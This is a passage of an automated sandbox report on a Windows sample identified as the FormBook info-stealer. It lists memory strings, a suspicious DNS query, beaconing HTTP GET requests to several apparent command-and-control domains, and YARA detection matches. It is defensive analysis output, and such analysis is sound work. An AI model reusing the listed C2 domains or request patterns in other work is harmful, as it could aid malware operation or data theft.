Source: explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3
Source: explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-dark
Source: explorer.exe, 00000003.00000000.1327499164.0000000008632000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3804772422.0000000008632000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15G9PH.img
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hHhh7.img
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyxkRJ.img
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.co
Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://oloobe.officeapps
Source: explorer.exe, 00000003.00000000.1327499164.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3081706085.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3805799384.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2192098195.0000000008903000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://passwordreset.micros
Source: explorer.exe, 00000003.00000002.3809058677.000000000B9B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000B9B0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comeer0
Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://tip.passwordreset.microso
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/EM0
Source: explorer.exe, 00000003.00000000.1327499164.00000000087FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3804772422.00000000087FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2192098195.00000000087FE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000003.00000002.3812069415.0000000010A6F000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3797952972.0000000004DAF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/health/medical/mayo-clinic-minute-who-benefits-from-taking-statins/ar-AA1h
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/home-and-garden/10-vital-home-maintenance-tasks-you-ll-regret-if
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/vote-to-oust-mccarthy-is-a-warning-sign-for-democracy-schola
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/counterpoint-individual-parents-rights-do-not-translate-to-a-licen
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/best-cities-by-generation/

Source: unknown

DNS traffic detected: queries for: www.zg9tywlubmftzw5ldzi0mdm.com

Source: C:\Windows\explorer.exe

Code function: 3_2_10E29F82 getaddrinfo,setsockopt,recv,

3_2_10E29F82

Source: global traffic	HTTP traffic detected: GET /rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs HTTP/1.1Host: www.fhstbanknigeria.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rs10/?s0=ZZ4PisnlhGWrM+/cjm+8AJE09HfnDkVQJTexn2MBWRnXnlNv1XnPYSI4wm3ClD5tCXKT&CB_=7nEpdJs HTTP/1.1Host: www.m-baer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rs10/?s0=slgSrzWs1cS9Mrf67s4eYcm1uzSVXOcUNS0TfgAxqWiu35L4D0Krxoj420pmZqiiSKyn&CB_=7nEpdJs HTTP/1.1Host: www.totalkfood.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rs10/?s0=/ItgkxO8+brroXQDZXm3WikSbiD+2fsSKu8F0pp3MeXxfp3Mbl7kcl4ctkKIsIVoIHZ+&CB_=7nEpdJs HTTP/1.1Host: www.cryptarrow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rs10/?s0=b31BqU8cfCYi6WO0sgYPso6gRJvymF5WHiXPhCkAgId39DsuJJ4fruR04rjCCBvdCTM/&CB_=7nEpdJs HTTP/1.1Host: www.starryallure.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rs10/?s0=SxqHGPQdBS+BYer8hqwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqPoHiKM2C6Px&CB_=7nEpdJs HTTP/1.1Host: www.nightoracle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rs10/?s0=pPtLjK/TtyZx8Wb0OUx+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli52Eg/aHEIkd2&CB_=7nEpdJs HTTP/1.1Host: www.mtauratarnt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rs10/?s0=h9cyBphY8kcBiKucT47V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXroGzz3qjH88&CB_=7nEpdJs HTTP/1.1Host: www.robertjamesfineclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: GCeHcfCef8.exe PID: 6280, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: GCeHcfCef8.exe PID: 7052, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmmon32.exe PID: 5656, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large array initializations

Source: 0.2.GCeHcfCef8.exe.4149970.3.raw.unpack, -Module-.cs

Large array initialization: _202E_202A_200D_200D_200E_202C_206D_202D_200C_200C_206E_206D_206E_202D_200E_206E_200F_200F_202E_202C_200E_206C_206F_202D_200F_200B_202A_202E_200D_206A_200E_202E_202C_200C_200E_200B_206B_202B_206A_202D_202E: array initializer size 5648

Source: GCeHcfCef8.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: GCeHcfCef8.exe PID: 6280, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: GCeHcfCef8.exe PID: 7052, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmmon32.exe PID: 5656, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_018DD55C	0_2_018DD55C
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_0569DC88	0_2_0569DC88
